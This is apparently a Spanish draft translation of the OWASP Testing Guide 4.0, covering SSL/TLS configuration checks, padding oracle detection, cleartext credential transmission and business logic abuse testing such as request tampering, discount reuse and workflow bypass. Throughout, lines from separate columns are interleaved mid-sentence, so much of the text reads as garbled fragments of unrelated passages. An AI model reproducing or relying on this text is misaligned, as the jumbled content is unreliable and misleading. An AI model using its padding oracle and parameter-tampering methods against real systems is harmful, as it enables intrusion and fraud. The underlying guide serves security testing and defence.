Guia de pruebas 4.0 "Borrador"
http://www.isg.rhul.ac.uk/tls/Lucky13.html
[*] Vulnerability Status: No Estos controles deben aplicarse a todos los canales de comunicación SSL-
wrapped visibles utilizados por la aplicación. Aunque este es el servicio https
que generalmente se ejecuta en el puerto 443, puede haber servicios
adicionales involucrados dependiendo de la arquitectura de las aplicaciones
===================================== web y de los problemas de implementación (si queda un puerto HTTPS
administrativo abierto, servicios HTTPS en puertos no estándar, etc.).
Haga clic sobre el candado que aparece en la ventana del navegador cuando
visita un sitio HTTPS; los evaluadores pueden consultar información
relacionada con el certificado que incluye al emisor, el período de validez, las
características de cifrado, etc.
El mensaje emitido por Firefox es diferente. Firefox se queja porque no puede • La victima se registra en una página web segura https://somesecuresite/.
determinar la identidad del sitio .com al que el certificado se refiere porque no
conoce la CA que firmó el certificado. • La página web segura emite una cookie de sesión cuando el cliente se
conecta.
Advertencia emitida por Mozilla Firefox [1] Revise si el sitio web soporta protocolos HTTP y HTTPS.
Como se mencionó anteriormente, existen otros tipos de vulnerabilidades que SSL Strip
no están relacionadas con el protocolo SSL/TLS utilizado, las suites de cifrado
o certificados. Algunas aplicaciones soportan HTTP y HTTPS, ya sea por el uso o porque lo
usuarios pueden escribir ambas direcciones y acceder al sitio. A menudo los
usuarios entran en un sitio web de HTTPS por un enlace o una redirección.
El siguiente es un escenario de cómo puede ocurrir el ataque: Pruebe mediante un proxy HTTP
Dentro de entornos corporativos, los evaluadores pueden ver los servicios que
no son directamente accesibles y pueden acceder a ellos a través del proxy
HTTP mediante el método CONNECT [36]. Ejemplo 10: Apache
La mayoría de las herramientas no funcionan en este escenario porque tratan web Apache2, abra el archivo ssl.conf y busque las directivas
de conectarse al puerto tcp deseado para iniciar el protocolo de conexión SSLCipherSuite, SSLProtocol, SSLHonorCipherOrder,
SSL/TLS. Con la ayuda de software de reinstalación como socat, [37] los SSLInsecureRenegotiation y SSLCompression.
probadores pueden activar esas herramientas para usarlas con los servicios
detrás de una proxy HTTP.
Ejemplo 8. Pruebe mediante un proxy HTTP Examine la validez de los certificados utilizados por la aplicación a nivel de
cliente y servidor. El uso de los certificados es principalmente a nivel del
Para conectarse con destined.application.lan:443 mediante un proxy servidor web, sin embargo, puede haber rutas de comunicación protegidas por
10.13.37.100:3128 ejecute socat como sigue: SSL (por ejemplo, hacia el DBMS). Los evaluadores deben revisar la
arquitectura de las aplicaciones para identificar todos los canales SSL
$ socat TCP-LISTEN:9999,reuseaddr,fork protegido.
PROXY:10.13.37.100:destined.application.lan:443,proxyport=3128
Herramientas
Entonces el evaluador puede apuntar todas las demás herramientas hacia
localhost:9999: • [21][Qualys SSL Labs - SSL Server Test: ssllabs.com
$ openssl s_client -connect localhost:9999 • [27] [Tenable - Nessus Vulnerability Scanner tenable.com: incluye algunos
plugins para probar diferentes vulnerabilidades relacionadas con SSL,
certificados y la presencia de autenticación HTTP básica sin SSL.
Todas las conexiones a localhost:9999 serán efectivamente retransmitidas por • [32] [TestSSLServer: bolet.org]: un scanner java - y también un ejecutable
socat mediante un proxy hacia destined.application.lan:443. de windows - incluye pruebas para suites de cifrado, CRIME y BEAST
Compruebe la configuración de los servidores web que ofrecen servicios de • [29] [SSLScan | sourceforge.net [SSL Tests | pentesterscripting.com l_tests]:
https. Si la aplicación web proporciona otros servicios SSL/TLS wrapped, un SSL Scanner y un wrapper para enumerar las vulnerabilidades SSL.
éstos deben comprobarse también.
• [31] [nmap | nmap.org]: puede ser utilizado primeramente para identificar
servicios basados en SSL y luego verificar el certificado y vulnerabilidades
SSL/TLS. Particularmente tiene algunos scripts para revisar [Certificate and
Ejemplo 9. Windows Server SSLv2 | nmap.org] y [SSL/TLS protocols/ciphers | nmap.org] soportados con
un rango interno.
Revise la configuración en Microsoft Windows Server (2000, 2003 y 2008)
usando la clave de registro: • [30] [curl | curl.haxx.se] y [openssl | openssl.org]: pueden ser usados para
consultas manuales de servicios SSL/TLS
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityPr
oviders\SCHANNEL\ • [9] [Stunnel | stunnel.org]: una clase notable de clientes SSL es aquella de
los proxies SSL como stunnel que puede utilizarse para permitir que
herramientas activas de no SSL se comuniquen con los servicios SSL)
que tiene algunas subclaves como cifras, protocolos y • [37] [socat | dest-unreach.org]: relay multipropósito
KeyExchangeAlgorithms.
• [38] [testssl.sh | testssl.sh ] • [14] [Qualys SSL Labs - SSL Server Rating Guide | ssllabs.com]
• [4][ Guía de pruebas OWASP - Pruebe la configuración de la infraestructura • [16] [Qualys SSL Labs - BEAST | community.qualys.com]
y la red (OTG-CONFIG-001) | owasp.org]
• [17] [Qualys SSL Labs - CRIME | community.qualys.com]
• [6] [Guía de pruebas OWASP - Pruebe el HTTP Strict Transport Security
(OTG-CONFIG-007) | owasp.org] • [7] [SurfJacking attack|resources.enablesecurity.com]
• [2] [Guía de pruebas OWASP - Pruebas para el envío de información • [8] [SSLStrip attack | thoughtcrime.org]
sensible por canales sin encriptar (OTG-CRYPST-003) | owasp.org]
• [19] [PCI-DSS v2.0 | pcisecuritystandards.org]
• [3] [Guía de pruebas OWASP - Pruebas del transporte de credenciales en un
canal encriptado (OTG-AUTHN-001) | owasp.org] • [35] [Xiaoyun Wang, Hongbo Yu: How to Break MD5 and Other Hash
Functions| springer.com]
• [22] [OWASP Cheat sheet - Transport Layer Protection |
owasp.org ]
Prueba del Padding Oracle (Relleno de Oracle)(OTG-CRYPST-002)
• [23] [OWASP TOP 10 2013 - A6 Sensitive Data Exposure |owasp.org]
Resumen
• [24] [OWASP TOP 10 2010 - A9 Insufficient Transport Layer Protection |
owasp.org] Un padding oracle es una función de la aplicación que decodifica datos
encriptados que proporciona el cliente, por ejemplo, estado de sesión interna
• [25] [OWASP ASVS 2009 - Verification 10 | code.google.com] almacenado en el cliente y fuga el estado de la validez del padding después de
descifrado.
• [26] [OWASP Application Security FAQ - Cryptography/SSL | owasp.org]
ietf.org]
• [36] [RFC2817 - Upgrading to TLS Within HTTP/1.1|] Los bloques de cifrado encriptan los datos en bloques de tamaños
determinados. Los tamaños de bloque utilizados por los cifradores comunes
• [34] [RFC6066 - Transport Layer Security (TLS) Extensions: Extension son de 8 y 16 bytes. Los datos cuyo tamaño no coincide con un múltiplo del
Definitions | ietf.org] tamaño del bloque de cifrado usado, tienen que rellenarse de una forma
específica para que el decodificador pueda eliminar el padding. Un esquema
• [11] [SSLv2 Protocol Multiple Weaknesses | osvdb.org] común de padding utilizado es PKCS #7. Llena los bytes restantes con el valor
de la longitud del padding.
• [12] [Mitre - TLS Renegotiation MiTM | cve.mitre.org]
Si el padding tiene la longitud de 5 bytes, el valor del byte 0 x 05 se repite Primero deben identificarse los puntos de entrada posibles para los padding
cinco veces después del texto. oracles. Generalmente deben cumplirse las siguientes condiciones:
Una condición de error está presente si el padding no coincide con la sintaxis [1] Los datos están codificados. Son buenos candidatos los valores que
del esquema de padding usado. Un padding oracle está presente si una parecen aleatorios.
aplicación filtra esta condición de error de padding específico para datos
cifrados proporcionados por el cliente. [2] Se utiliza un cifrado de bloque. La longitud del texto cifrado decodificado
(Base64 se utiliza a menudo); es un múltiplo de los tamaños de bloque de
cifrado comunes como 8 o 16 bytes. Los diferentes textos de cifrado (por
ejemplo, reunidos en diferentes sesiones o manipulando el estado de la sesión)
Esto puede ocurrir exponiendo las excepciones (e.g. BadPaddingException en comparten un divisor común en la longitud.
Java) directamente, por diferencias sutiles en las respuestas enviadas al cliente
o por otro canal lateral como comportamiento de sincronización.
Ejemplo:
Ciertos modos de operación criptográfica permiten ataques de bit-flipping, Dg6W8OiWMIdVokIDH15T/A== resulta despues de decodificar Base64 en
donde voltear un bit en el texto de cifrado hace que el bit también se voltee en 0e 0e 96 f0 e8 96 30 87 55 a2 42 03 1f 5e 53 fc. Esto parece ser aleatorio y
el texto simple. con una longitud de 16 bytes.
Voltear un bit en el enesimo bloque en los datos encriptados de CBC causa Si se identifica un valor ingresado que es un buen candidato, debe verificarse
que el mismo bit en el (enesimo+1) bloque se voltee en los datos descifrados. el comportamiento de la aplicación con la manipulación del valor codificado
El enesimo bloque del texto cifrado que se decodifica es inhabilitado con esta en referencia al bit.
manipulación.
Un ataque de padding oracle también permite a un atacante cifrar textos Si se sabe que la cadena cifrada es un solo bloque (el IV se almacena en el
arbitrarios simples sin el conocimiento de la clave usada y el cifrado. Si la servidor o la aplicación está utilizando una mala práctica de codificado de IV),
aplicación asume como correcta la integridad y autenticidad de los datos varios cambios de bits deben realizarse en turnos. Un enfoque alternativo sería
descifrados, un atacante podría ser capaz de manipular el estado de sesión anteponer un bloque al azar y cambiar bits para hacer que el último byte del
interna y posiblemente obtener mayores privilegios. bloque añadido tome todos los valores posibles (0 a 255).
Cómo probar Las pruebas y el valor base deben causar al menos tres diferentes estados
durante y después del descifrado:
Pruebas de Caja Negra
• Se consigue descifrar el texto cifrado, los datos resultantes son confusos y [1] La integridad del texto cifrado debe ser verificada por un mecanismo
causan algunas excepciones y errores de manejo en la lógica de la aplicación. seguro, como HMAC o con formas de autenticar la operación de cifrado como
GCM o CCM.
Compare las respuestas con cuidado. Busque sobre todo las excepciones y los
mensajes que indican que algo está mal con el padding. Si aparecen estos
mensajes, la aplicación contiene un oracle padding. Herramientas
• PadBuster: github.com
Si los tres estados diferentes descritos anteriormente son implícitamente • python-paddingoracle: github.com
observables (mensajes de error diferentes, tiempos del lado de los canales),
hay una alta probabilidad de que en este momento hay un oracle padding • Poracle: github.com
presente. Trate de realizar el ataque de oracle padding para confirmarlo.
• Padding Oracle Exploitation Tool (POET): netifera.com
Ejemplos:
Ejemplos
Libros Blancos
• En Java, una excepción javax.crypto.BadPaddingException se lanza en este
caso. • Wikipedia - Padding oracle attack: en.wikipedia.org
Verifique que todos los lugares donde están codificados los datos del cliente, Como regla general, si los datos deben protegerse cuando se almacenan, estos
que sólo deben ser conocido por el servidor, se encuentran decodificados. datos también deben protegerse durante la transmisión. Algunos ejemplos de
Dicho código debe cumplir las siguientes condiciones: datos sensibles son:
• Información utilizada en la autenticación (por ejemplo credenciales, PINs, <body bgcolor=white> <h1>401 Authorization Required</h1> Invalid login
identificadores de sesión, Fichas, Cookies…) credentials! </body></html>
Ejemplo 1: Autenticación básica en HTTP La Cookie del identificador de sesión debe ser transmitida en canales
protegidos. Si la cookie no tiene la bandera de seguridad [6] se permite a la
Un ejemplo típico es el uso de una autenticación básica en HTTP. Cuando se aplicación transmitirla sin encriptar.
utiliza una autenticación básica, se codifican las credenciales de usuario en
lugar de encriptarlas y se envían como encabezados HTTP. En el ejemplo Note a continuación que la programación de la cookie se realiza sin la bandera
siguiente, el evaluador usa curl [5] para evaluar este tema. Note cómo la de seguridad, y todo el proceso de registro se realiza en HTTP y no HTTPS..
aplicación utiliza la autenticación básica y HTTP en lugar de HTTPS
Accept-Language: en-US,en;q=0.5
Cookie: JSESSIONID=BD99F321233AF69593EDF52B123B5BDA;
X-XSS-Protection: 1; mode=block
Content-Length: 0 • [5] curl puede ser usado para revisar cómo buscar páginas manualmente
http://example.com/private
• [2] OWASP TOP 10 2010 - Insufficient Transport Layer Protection
Host: example.com
El mayor enfoque es en aplicaciones web. Hay un debate dentro de la El primer ejemplo comienza con una manipulación simple del parámetro,
comunidad acerca de si estos problemas representan particularmente nuevos mientras que el segundo es un ejemplo del mundo real de un proceso que
conceptos, o si son variantes de principios bien conocidos. conduce a subvertir completamente la aplicación.
La prueba de fallas en la lógica del negocio es similar a los tipos de prueba Ejemplo 1:
utilizados por evaluadores funcionales que se enfocan en la prueba de estado
lógico o finito. Estos tipos de pruebas requieren que los profesionales de la Supongamos que un sitio de comercio electrónico permite a los usuarios
seguridad piensen un poco diferente, desarrollen casos de abuso y mal uso y seleccionar elementos que desean comprar, ver una página de resumen y
usen muchas de las técnicas de prueba adoptadas por los evaluadores luego licitar la venta. ¿Qué pasaría si un atacante vuelve a la página de
funcionales. resumen, manteniendo la validez de la sesión e inyecta un menor costo en
un elemento, completa la transacción y luego sale?
Ejemplo 2: Esto es importante porque, sin esta protección, los atacantes pueden ser
capaces de "engañar/trucar" la aplicación para que les permita entrar en
Retener/bloquear recursos y evitar que otros puedan comprar estos artículos secciones de la aplicación del sistema a las cuáles no deberian tener acceso
en línea puede resultar en que los atacantes compren artículos a bajo precio. en ese momento en particular, eludiendo así el flujo de trabajo de la lógica
La solución a este problema es implementar tiempos de cierre de sesión y de negocio de la aplicación.
mecanismos para asegurar que sólo el precio correcto puede ser cargado.
Las explotaciones de la lógica del negocio pueden separarse en las En las pruebas del tiempo de procesamiento, verificamos que la aplicación
siguientes categorías: no permita a los usuarios manipular un sistema o adivinar su
comportamiento basado en los tiempos de procesamiento de entrada o
salida.
Esto es importante porque, sin esta protección, los atacantes pueden insertar 4.12.5 Prueba del número de veces que limita el uso de una función (OTG-
datos/información "no validada" en la aplicación/sistema en "puntos de BUSLOGIC-005)
entrega" donde el sistema/aplicación considera que los datos/información es
"buena" y ha sido válida desde que los puntos de"entrada" realizaron la Al probar el límite de una función, verifique que la aplicación no permita a
validación de datos como parte del flujo de trabajo de la lógica de negocio. los usuarios utilizar partes de la aplicación o sus funciones, más veces de
las requeridas por el flujo de la lógica de trabajo.
Al evadir el flujo de trabajo y burlar las pruebas de secuencia correcta, Aunque existen herramientas para probar y verificar que los procesos del
verificamos que la aplicación no permite a los usuarios realizar acciones negocio funcionan correctamente en situaciones válidas, estas herramientas
fuera del flujo de proceso de negocios "aprobado/requerido". son incapaces de detectar vulnerabilidades lógicas. Por ejemplo, las
herramientas no tienen posibilidad de detectar si un usuario es capaz de
evitar el flujo de proceso del negocio a través de la edición de parámetros,
predicción de nombres de recursos o escalada de privilegios para acceder a
Esto es importante ya que, sin esta protección, los atacantes pueden ser recursos restringidos ni tienen ningún mecanismo para ayudar a los
capaces de evadir o burlar los flujos de trabajo y "controles" que les permite evaluadores humanos para que sospechen de esta situación.
entrar prematuramente o saltarse las secciones de la aplicación "requerida s",
y potencialmente permite que la acción/transacción termine sin completar el
proceso de negocio, dejando al sistema con información de seguimiento
incompleta en el backend. Los siguientes son algunos tipos comunes de herramientas que pueden ser
útiles en la identificación de temas relacionados con la lógica del negocio.
En la prueba de carga de tipos de archivos inesperados, verificamos que la • Paros Proxy: parosproxy.org
aplicación no permita a los usuarios cargar tipos de archivos que el sistema
no espera o requiera de acuerdo a la lógica del negocio.
4.12.9 Prueba de la posibilidad de carga de archivos maliciosos (OTG- • TamperIE (for Internet Explorer): bayden.com
BUSLOGIC-009)
Libros Blancos
Con Session Manager usted puede grabar rápidamente el estado de su • Business Logic Vulnerabilities in Web Applications:
navegador actual y recargarlo cuando sea necesario. Puede gestionar accorute.googlecode.com
múltiples sesiones, renombrarlas o removerlas de la biblioteca de sesión.
Swap My Cookies es un administrador de sesión. Gestiona sus cookies, • Finite State testing of Graphical User Interfaces, Fevzi Belli:
permitiéndole conectarse en cualquier sitio web con varias cuentas slideshare.net
diferentes.
• Security Issues in Online Games, Jianxin Jeff Yan and Hyun-Jin Choi:
homepages.cs.ncl.ac.uk
• HTTP Response Browser: chrome.google.com/
• Securing Virtual Worlds Against Real Attack, Dr. Igor Muttik, McAfee:
info-point-security.com
• Prevent application logic attacks with sound app security practices:
searchappsecurity.techtarget.com
Jeremiah Grossman Founder and CTO, WhiteHat Security: • Real-Life Example of a ‘Business Logic Defect: infosecisland.com
whitehatsec.com
Libros
Relacionados a OWASP • The Decision Model: A Business Logic Framework Linking Business and
Technology, By Barbara Von Halle, Larry Goldberg, Published by CRC
• Business Logic Attacks – Bots and Bats, Eldad Chai: blog.imperva.com Press, ISBN1420082817 (2010)
• OWASP Detail Misuse Cases: owasp.org Prueba de la validación de datos de la lógica del negocio (OTG-
BUSLOGIC-001)
Resumen
• How to Prevent Business Flaws Vulnerabilities in Web Applications,
Marco Morana: slideshare.net La aplicación debe asegurarse que pueden introducirse lógicamente datos
válidos en la sección de acceso directo, así como directamente en el lado
del servidor de una aplicación del sistema. Sólo verificar los datos
localmente puede dejar a las aplicaciones vulnerables a inyecciones de
Sitios web útiles servidor a través de proxies o en los intercambios con otros sistemas.
Las vulnerabilidades relacionadas con la validación de datos son únicas, ya crédito en múltiples lugares muy rápidamente, es posible superar mi límite
que son para una aplicación específica y diferente a las vulnerabilidades si los sistemas están basando sus decisiones en los datos de anoche.
relacionadas con la manipulación de solicitudes en las que están más
preocupadas de la lógica de los datos en lugar de simplemente romper el
flujo de trabajo de la lógica del negocio.
Cómo probar
Ejemplo 1
Método de prueba específica:
Supongamos que administra un sitio de comercio electrónico de multiples
niveles. El usuario escoge la alfombra, ingresa el tamaño, realiza el pago y
la aplicación de acceso directo ha verificado que toda la información
ingresada es correcta y válida para el contacto, tamaño, fabricación y color • Realizar pruebas GUI de validación funcional en la sección pública de la
de la alfombra. Sin embargo, la lógica de negocio tiene, en el fondo, dos aplicación para asegurarse que se aceptan únicamente los valores "válidos".
rutas.
• Pruebas del esquema de gestión de sesión (OTG-SESS-001) aquellas que permiten la depuración y presentación de pantallas especiales o
ventanas que son muy útiles durante el desarrollo, pero pueden filtrar
información o eludir la lógica del negocio.
Las aplicaciones deben tener controles lógicos para evitar que el sistema
acepte solicitudes falsificadas que pueden permitir a los atacantes la
• El Zed Attack Proxy (ZAP) es una herramienta de pruebas de penetración posibilidad de explotar la lógica del negocio, proceso o flujo de la
integrada, fácil de usar para encontrar vulnerabilidades en aplicaciones web. Está aplicación. La falsificación de solicitudes no es nueva; el atacante utiliza un
diseñada para ser utilizada por personas con amplia experiencia en seguridad y, proxy de intercepción para enviar solicitudes POST/GET de HTTP a la
como tal, es ideal para desarrolladores y evaluadores funcionales que son nuevos en aplicación.
el uso de pruebas de penetración. ZAP ofrece escáneres automatizados, así
como un conjunto de herramientas que permiten encontrar las
vulnerabilidades de seguridad manualmente.
Mediante la falsificación de solicitudes, los atacantes pueden evadir la
lógica del negocio o proceso al encontrar, predecir y manipular los
parámetros para hacer que la aplicación piense que un proceso o tarea ha
Referencias ocurrido o no.
books.google.com Además, las solicitudes falsificadas pueden permitir la subversión del flujo
del programa o de la lógica del negocio invocando funciones "ocultas" o
funcionalidad como la depuración, inicialmente utilizada por los
desarrolladores y evaluadores, denominada a veces "Huevo de Pascua". Un
Remediación "huevo de Pascua" (Easter egg) es una broma interna intencional, mensaje
oculto o una función en un trabajo como un programa de computadora,
La aplicación/sistema debe garantizar que sólo datos "lógicamente válidos" película, libro o crucigrama.
se acepten en todas las entradas y puntos de transferencia de la aplicación o
sistema, y que los datos no se consideren confiables una vez que han sido
ingresados en el sistema.
Según el diseñador de juegos Warren Robinett, el término fue acuñado en
Atari por el personal que fue alertado de la presencia de un mensaje secreto
que había sido escondido por Robinett en su juego ya ampliamente
Prueba de la habilidad de manipular consultas (OTG-BUSLOGIC-002) distribuido, Adventure. Se puso este nombre para evocar la idea de una
cacería tradicional de "huevos de Pascua.”
Resumen
http://en.wikipedia.org/wiki/Easter_egg_(media)
Falsificar las solicitudes es un método que utilizan los atacantes para eludir
la sección de acceso público de una aplicación GUI, para presentar
directamente la información para que se procese en la sección de acceso
restringido. El objetivo del atacante es enviar las solicitudes POST/GET de Ejemplos
HTTP a través de un proxy de intercepción con los valores de datos no
soportados, protegidos en contra o esperados por la lógica del negocio de la Ejemplo 1
aplicación.
Supongamos que un teatro en su sitio de comercio electrónico permite a los
usuarios seleccionar su boleto, aplicar un descuento de tercera edad del 10%
una vez en toda la venta, ver el subtotal y licitar la venta. Si un atacante es
Algunos ejemplos de solicitudes falsificadas que explotan parámetros que capaz de ver a través de un proxy que la aplicación cuenta con un campo
pueden adivinarse o predecirse o que exponen funciones "ocultas" como oculto (de 1 o 0) usado por la lógica del negocio para determinar si ha
habido un descuento o no, el atacante podría presentar el 1 o el valor de • Si se encuentra que algún valor es adivinable, este valor puede ser
"descuento no ha sido tomado" varias veces para aprovechar el descuento modificado y se puede obtener visibilidad inesperada.
varias veces.
Método de prueba específica 2:.
Ejemplo 2
• Usando un proxy de intercepción, observe la solicitud POST/GET de
Supongamos que un juego de video en línea paga fichas por puntos HTTP en busca de indicios de funciones ocultas como la de depuración, que
anotados por encontrar tesoros piratas, piratas y por cada nivel completado. puede ser encendida o activada.
Estas fichas pueden intercambiarse posteriormente por premios.
Asimismo, si un atacante es capaz de ver a través de un proxy que la Pruebas para determinar la Exposición de las Variables de Sesión (OTG -
aplicación tiene un campo oculto utilizado durante el desarrollo y pruebas SESS-004)
para habilitar un registro que indica dónde se encuentran otros jugadores en
línea o los tesoros escondidos en relación con el atacante, entonces podrían
ir rápidamente a estos lugares y anotar puntos.
Pruebas de un CSRF (CSRF) (OTG-SESS-005)
Cómo probar
Pruebas de enumeración de cuentas y adivinanza de cuentas de usuario
Método de prueba genérica (OTG-IDENT-004)
• Una vez encontrados, intente insertar datos lógicamente válidos en el ZAP es una herramienta de pruebas de penetración integrada, fácil de usar para
sistema o aplicación, lo que permite al usuario ir a través de la encontrar vulnerabilidades en aplicaciones web. Está diseñada para ser utilizada por
aplicación/sistema contra el flujo normal de la lógica del negocio. personas con amplia experiencia en seguridad y, como tal, es ideal para
desarrolladores y evaluadores funcionales que son nuevos en el uso de pruebas de
penetración. ZAP ofrece escáneres automatizados, así como un conjunto de
herramientas que permiten encontrar las vulnerabilidades de seguridad
Método de prueba específica 1: manualmente.
fragilesecurity.blogspot.com
Remediación
un atacante puede usar un proxy interceptor para agregar o actualizar datos Método de prueba específica 2
a los que no debería tener acceso y podría destruir la integridad de los datos
indicando que el ciudadano no estaba casado, pero suministrando los datos • Usando un proxy, capture cualquier tráfico HTTP en busca de un lugar
para el nombre de un cónyuge. Este tipo de inserción o actualización de para insertar información en las áreas de la aplicación que no son editables.
datos no verificados destruye la integridad de los datos y podría haberse
evitado si se seguía la lógica del proceso del negocio.
•Si los encuentra, vea cómo este campo se compara con la aplicación GUI e
interrogue a este valor mediante el proxy, presentando diferentes valores,
Ejemplo 4 tratando de eludir los procesos del negocio y manipulando los valores a los
que no debería tener acceso..
Muchos sistemas incluyen registros para el propósito de auditoría y
solución de problemas. Pero, ¿qué tan buena/válida es la información de
estos registros? ¿Pueden ser manipulados por los atacantes intencional o
accidentalmente, destruyendo su integridad? Método de prueba específica 3
• Para cada componente identificado, determine qué tipo de Todos los casos de prueba de validación de ingresos.
datos/información son lógicamente aceptables y de qué tipo de
aplicación/sistema debe protegerse. Tome en cuenta también quién, según la
lógica del negocio, tiene autorización para insertar, actualizar y eliminar
datos/información y en qué componente. Herramientas
• Usando una proxy capture cualquier tráfico de HTTP en búsqueda de ZAP es una herramienta de pruebas de penetración integrada, fácil de usar para
campos ocultos. encontrar vulnerabilidades en aplicaciones web. Está diseñada para ser utilizada por
personas con amplia experiencia en seguridad y, como tal, es ideal para
desarrolladores y evaluadores funcionales que son nuevos en el uso de pruebas de
penetración. ZAP ofrece escáneres automatizados, así como un conjunto de
• Si encuentra un campo oculto, vea cómo este campo se compara con la herramientas que permiten encontrar las vulnerabilidades de seguridad
aplicación GUI e interrogue a este valor mediante el proxy, presentando manualmente..
diferentes valores, tratando de eludir los procesos del negocio y
manipulando los valores a los que no debería tener acceso.
Referencias
• Implementing Referential Integrity and Shared Business Logic in a RDB: acuerdo a eso, cambiar el comportamiento basado en esa expectativa y
agiledata.org "jugarle al sistema".
Ejemplo 1
• Use referential integrity to enforce basic business rules in Oracle: Los videos de juegos de azar/tragamonedas pueden tardar más tiempo en
techrepublic.com procesar una transacción antes de realizar un desembolso fuerte. Esto
permitiría a los jugadores astutos apostar cantidades mínimas hasta que vean
el tiempo de proceso largo que los haría apostar el máximo.
Los atacantes pueden ser capaces de eludir la lógica del negocio y ejecutar
• Pruebas del tiempo de cierre de sesión (OTG-SESS-007) una función más veces que las "permitidas" al explotar la aplicación para
obtener beneficios personales.
Referencias
Ejemplo
Ninguna
Supongamos que un sitio de comercio electrónico permite a los usuarios
aprovechar alguno de los muchos descuentos en su compra total y luego
proceder a salir y licitar. ¿Qué sucede si el atacante navega a la página de
Remediación descuentos después de tomar y aplicar el descuento "admisible"? ¿Pueden
tomar ventaja de otro descuento? ¿Pueden tomar ventaja del mismo
Desarrolle aplicaciones con el tiempo de procesamiento en mente. Si los descuento varias veces?
atacantes pueden obtener algún tipo de ventaja al conocer los diferentes
tiempos de procesamiento y los resultados, agregue pasos adicionales para
que, sin importar los resultados, se proporcione el mismo marco de tiempo
de procesamiento. Cómo probar
Por ejemplo: Un sitio de comercio electrónico sólo puede permitir que los • Pruebas para determinar un mecanismo de bloqueo débil (OTG-AUTHN-
usuarios apliquen un descuento una vez por cada transacción, o algunas 003)
Ejemplos
Remediación
Ejemplo 1
La aplicación debe tener controles para asegurar que se sigue la lógica del
negocio y si una función/acción sólo puede ejecutarse un cierto número de Muchos de nosotros recibimos algún tipo de "puntos de club/fidelidad" por
veces y, cuando se alcanza el límite, el usuario no puede ejecutar la función. las compras en supermercados y gasolineras. Supongamos que un usuario
pudo iniciar una transacción vinculada a su cuenta y luego, después de
agregar puntos a su cuenta de club/lealtad, cancela la transacción o quita
elementos de su "canasta" y licita.
Para evitar que los usuarios usen una función más veces de las adecuadas, la
aplicación puede utilizar mecanismos tales como cookies para contabilizar o
mediante sesiones, que no permitan a los usuarios acceder a ejecutar la
función más veces. En este caso, el sistema no debe aplicar puntos/créditos a la cuenta hasta que
se licita o los puntos/créditos deben "deshacerse" si el incremento de
puntos/crédito no coinciden con la oferta final. Con esto en mente, un
atacante puede iniciar transacciones y cancelarlas, para aumentar su nivel de
Pruebas para la evasión de los flujos de trabajo (OTG-BUSLOGIC-006) puntos sin realmente comprar algo.
Resumen
La lógica del negocio de la aplicación debe pedir al usuario que complete los •Revise la documentación del proyecto y utilice pruebas exploratorias en
pasos específicos en el orden correcto/específico y si el flujo de trabajo se busca de métodos para saltar o ir a otros pasos en el proceso de la aplicación,
termina sin completarse correctamente, todas las acciones que generó se en un orden diferente del flujo de la lógica del negocio diseñado/esperado.
"deshacen" o cancelan. Las vulnerabilidades relacionadas con la evasión de
los flujos de trabajo o el saltarse el flujo de trabajo de la lógica del negocio
correcto son únicas ya que son muy específicas para cada sistema/aplicación
• Para cada método, desarrolle un caso de mal uso y trate de evitar o realizar • Prueba de comprobación de integridad (OTG-BUSLOGIC-003)
una acción que sea "inaceptable" por el flujo de trabajo de la lógica del
negocio.
• Inicie una transacción dentro de la aplicación hasta pasar los puntos que • Prueba del número de veces que limita el uso de una función (OTG-
disparan los créditos/puntos hacia la cuenta del usuario. BUSLOGIC-005)
•Cancele la transacción o reduzca la oferta final de manera que los valores • Prueba de las defensas contra el mal uso de la aplicación (OTG-
del punto deban ser disminuidos y compruebe el sistema de puntos/crédito BUSLOGIC-007)
para asegurarse que se registraron los puntos/créditos adecuados.
• Luego intente añadir, editar y eliminar datos que dejarían a los datos
existentes en un estado inválido o con valores inválidos para asegurar que al
usuario no le esté permitido guardar la información incorrecta. Algunos datos Referencias
o información "no válidos" pueden ser palabras específicas (palabras soeces)
o temas específicos (por ejemplo, cuestiones políticas). • OWASP Detail Misuse Cases: owasp.org
infosecisland.com
Remediación
• Prueba de la validación de datos de la lógica del negocio (OTG-
BUSLOGIC-001) La aplicación debe ser autoconsciente y tener comprobaciones localizadas
que aseguren que los usuarios completen cada paso del proceso del flujo de
trabajo en el orden correcto y evitar que los atacantes eludan/salten/o repitan
los pasos/procesos del flujo de trabajo. Probar las vulnerabilidades de flujo
• Prueba de la habilidad de manipular consultas (OTG-BUSLOGIC-002) de trabajo implica el desarrollar casos de abuso/mal uso de la lógica del
negocio con el objetivo de completar el proceso de negocio al no completar
los pasos correctos en el orden correcto.
Documento Pre-release cortesía de Fernando Vela para drangonjar.org
289
Guia de pruebas 4.0 "Borrador"
Prueba de las defensas contra el mal uso de la aplicación (OTG- Si la aplicación no responde de ninguna manera y el atacante puede
BUSLOGIC-007) continuar abusando de la funcionalidad y envia contenido claramente
malicioso hacia la aplicación, la aplicación ha fallado este caso de prueba. En
Resumen la práctica, es poco probable que las acciones discretas del ejemplo anterior
sucedan así. Es mucho más probable que una herramienta de fuzzing se
El mal uso y uso no válido de una funcionalidad válida pueden identificar utilice para identificar las debilidades de cada parámetro a la vez. Esto es lo
ataques que trata de enumerar la aplicación web, identificar las debilidades y que un evaluador de seguridad habrá llevado a cabo, también.
explotar vulnerabilidades. Deberían realizarse pruebas para determinar si
existen mecanismos defensivos a nivel de la aplicación para proteger la
aplicación.
Cómo probar
[3] Altera una solicitud GET convirtiéndola en POST. • Rechazar los ingresos que contienen determinados caracteres.
[4] Agrega un parámetro extra. • Bloquear una cuenta temporalmente después de una serie de fallos de
autenticación.
[5] Duplica el parámetro de la pareja nombre/valor.
• Activa medidas de autenticación adicionales para las funciones restantes. • Parámetros adicionales de nombres, duplicados o faltantes
• Agrega retrasos de tiempo en cada ciclo de petición-respuesta. • Validación de ingresos múltiples o fallas de verificación de la lógica del
negocio con valores que no pueden ser el resultado de errores o faltas
• Comienza a grabar datos adicionales sobre las interacciones del usuario ortográficas del usuario
(por ejemplo encabezados de solicitudes HTTP desinfectados, cuerpos y
cuerpos de respuesta). • Recepción de datos estructurados (por ejemplo, JSON, XML) de un
formato no válido
• Utilizar la aplicación más rápido de lo que debería ser posible sin • IR 7684 Common Misuse Scoring System (CMSS), NIST:
herramientas de automatización
csrc.nist.gov
• Cambio en la geo-localización continental de un usuario
Todos los otros casos son relevantes. El riesgo en permitir a los usuarios cargar archivos es que los atacantes
pueden enviar un tipo de archivo inesperado que podría ejecutarse y tener un
impacto adverso sobre la aplicación o sistema a través de ataques que pueden
desfigurar el sitio web, ejecutar comandos remotos, navegar por los archivos
Herramientas del sistema, navegar en los recursos locales, atacar a otros servidores o
